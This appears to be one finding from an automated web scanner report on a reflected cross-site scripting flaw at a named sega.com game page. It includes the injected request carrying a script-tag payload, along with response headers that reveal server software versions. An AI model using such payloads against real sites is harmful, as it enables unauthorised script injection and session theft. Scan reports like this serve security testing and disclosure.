1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.sega.com |
Path: | /games/sonic-colors/ |
GET /games/sonic-colors/?2056b"><script>alert(1)< Host: www.sega.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:38:06 GMT Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny3 Set-Cookie: PHPSESSID=A~47c85520 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sega_preferred_territory Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 36088 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; c ...[SNIP]... <a href="?t=EnglishUK& ...[SNIP]... |